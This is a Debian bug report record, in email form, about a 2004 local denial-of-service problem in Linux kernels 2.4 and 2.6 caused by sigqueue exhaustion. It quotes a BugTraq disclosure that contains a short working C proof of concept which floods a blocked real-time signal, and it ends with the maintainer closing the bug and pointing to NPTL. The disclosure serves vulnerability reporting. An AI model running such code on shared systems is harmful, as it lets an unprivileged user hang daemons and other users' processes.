Bug#243954: marked as done (DoS on Linux kernel 2.4 and 2.6 using sigqueue overflow)
Your message dated Sun, 16 Jan 2005 11:47:08 +0900
with message-id <81acraqedv.wl@omega.webmasters.gr.jp>
and subject line Bug#243954: Processed: Reopen and Reassign 243954
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 15 Apr 2004 20:13:53 +0000
>From plhofmei@zionlth.org Thu Apr 15 13:13:53 2004
Return-path: <plhofmei@zionlth.org>
Received: from pxy5allmi.all.mi.charter.com (proxy5-grandhaven.chartermi.net) [24.247.15.44]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1BEDFB-0007Kr-00; Thu, 15 Apr 2004 13:13:53 -0700
Received: from oneil.hn.org (66.227.150.91.bay.mi.chartermi.net [66.227.150.91])
by proxy5-grandhaven.chartermi.net (8.11.7p1+Sun/8.11.6) with ESMTP id i3FKDWE06213
for <submit@bugs.debian.org>; Thu, 15 Apr 2004 16:13:33 -0400 (EDT)
Received: from plhofmei by oneil.antiochcomputerconsulting.com with local (Exim 3.35 #1 (Debian))
id 1BEDEo-0008Fv-00
for <submit@bugs.debian.org>; Thu, 15 Apr 2004 16:13:30 -0400
Date: Thu, 15 Apr 2004 16:13:30 -0400
From: Phillip Hofmeister <plhofmei@zionlth.org>
To: submit@bugs.debian.org
Subject: DoS on Linux kernel 2.4 and 2.6 using sigqueue overflow
Message-ID: <20040415201330.GA21803@zionlth.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Mutt/1.4.2i
X-PGP-Key: http://www.zionlth.org/~plhofmei/key.asc
X-Charter-MailScanner-Information:
X-Charter-MailScanner:
Delivered-To: submit@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-7.0 required=4.0 tests=BAYES_00,HAS_PACKAGE
autolearn=no version=2.60-bugs.debian.org_2004_03_25
X-Spam-Level:
X-CrossAssassin-Score: 1
Package: kernel
Severity: Critical
Tag: Security
Justification: Any non-privileged user could cause the lock up of a
production system running the Linux kernel since child processes will
not terminate correctly.
Below is an email that describes the problem (posted on BugTarq)
<BugTraq Message>
From: "Nikita V. Youshchenko" <yoush@cs.msu.su>
To: bugtraq@securityfocus.com
Subject: Possible DoS on Linux kernel 2.4 and 2.6 using sigqueue overflow.
Date: Mon, 12 Apr 2004 06:06:04 -0400
User-Agent: KMail/1.5.4
Hello.
We faced a bug (?) in Linux kernel causing different misbehaviours on
our
server. After exploration, it seems that we found some security
implications of this issue.
When a process exits, it's parent is notified by SIGCHLD, and finished
child is kept in process table in "zombie" state until parent process
(or
init, if parent is already ended) handles child exit.
Similary, with linuxthreads, when a thread exits, another thread in the
same process is notified by signal 33 (SIGRT_1), and exitted thread
exists
in the process table in "zombie" state until the exit is handled.
When a signal that notifies about exit is generated by the kernel,
kernel
code allocates a "struct sigqueue" object. This object keeps information
about the signal until the signal is delivered.
Only a limited number of such objects may be allocated at a time.
There is some code in the kernel that still allows signals with numbers
less than 32 to be delivered when "struct sigqueue" object can't be
allocated. However, for signal 33 signal generation routine just returns
-EAGAIN in this case.
As the result, process is not notified about thread exits, and ended
thread
is left in "zombie" state.
Details are at
http://www.ussg.iu.edu/hypermail/linux/kernel/0404.0/0208.html
For long-living processes that create short-living threads (such as
mysqld), this causes process table overflow in several minutes.
"struct sigqueue" overflow may be easily caused from userspace, if a
process blocks a signal and then receives a large number of such
signals.
The following sample code does that:
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
int main()
{
sigset_t set;
int i;
pid_t pid;
sigemptyset(&set);
sigaddset(&set, 40);
sigprocmask(SIG_BLOCK, &set, 0);
pid =3D getpid();
for (i =3D 0; i < 1024; i++)
kill(pid, 40);
while (1)
sleep(1);
}
So if a user runs such code (or just runs a buggy program that blocks a
signal and then receives 1000 such signals - which happens here), this
will cause a DoS againt anything running on the same system that uses
linuxthreads, including daemons running as root.
On systems that use NPTL (such as Linux 2.6 kernel) there is no 'thread
zombie' problem, because in NPTL another notification mechanism is used.
However, DoS is still possible (and really happens - in form of daemon
crashes), because when it is not possible to allocatre a "struct
sigqueue"
object, kernel behaviour in signal-passing changes, causing random hangs
and segfaults in different programs.
</BugTraq Message>
I have compiled the code and executed it on my system. I am currently
running 2.4.26 (Stock Kernel from kernel.org along with the GRSecurity
Patch). It would appear this problem has not been fixed with the
release of 2.4.26.
Take care,
--=20
Phillip Hofmeister
PGP/GPG Key:
http://www.zionlth.org/~plhofmei/
wget -O - http://www.zionlth.org/~plhofmei/key.asc | gpg --import
---------------------------------------
Received: (at 243954-done) by bugs.debian.org; 16 Jan 2005 02:47:10 +0000
>From gotom@debian.or.jp Sat Jan 15 18:47:10 2005
Return-path: <gotom@debian.or.jp>
Received: from omega.webmasters.gr.jp (webmasters.gr.jp) [218.44.239.78]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1Cq0RZ-0007FB-00; Sat, 15 Jan 2005 18:47:09 -0800
Received: from omega.webmasters.gr.jp (localhost [127.0.0.1])
by webmasters.gr.jp (Postfix) with ESMTP id C2F41DECCB
for <243954-done@bugs.debian.org>; Sun, 16 Jan 2005 11:47:08 +0900 (JST)
Date: Sun, 16 Jan 2005 11:47:08 +0900
Message-ID: <81acraqedv.wl@omega.webmasters.gr.jp>
From: GOTO Masanori <gotom@debian.or.jp>
To: 243954-done@bugs.debian.org
Subject: Re: Bug#243954: Processed: Reopen and Reassign 243954
In-Reply-To: <813c71enta.wl@omega.webmasters.gr.jp>
References: <20040417174908.GA2552@zionlth.org>
<handler.s.C.108222790319833.transcript@bugs.debian.org>
<813c71enta.wl@omega.webmasters.gr.jp>
User-Agent: Wanderlust/2.9.9 (Unchained Melody) SEMI/1.14.3 (Ushinoya)
FLIM/1.14.3 (=?ISO-8859-4?Q?Unebigory=F2mae?=) APEL/10.3 Emacs/21.2
(i386-debian-linux-gnu) MULE/5.0 (SAKAKI)
MIME-Version: 1.0 (generated by SEMI 1.14.3 - "Ushinoya")
Content-Type: text/plain; charset=US-ASCII
Delivered-To: 243954-done@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
At Sun, 18 Apr 2004 16:40:33 +0900,
GOTO Masanori wrote:
> Because kernel can't handle POSIX Threads appropriately for a long
> time (over 5 years) before appearing NPTL. So linuxthreads tried to
> use signal because of kernel incapability. This is a long time
> problem item, and this is one reason why NPTL (for both kernel and
> glibc) is written. Use NPTL.
There's no reason to keep open this report. I close it.
Regards,
-- gotom
Reply to: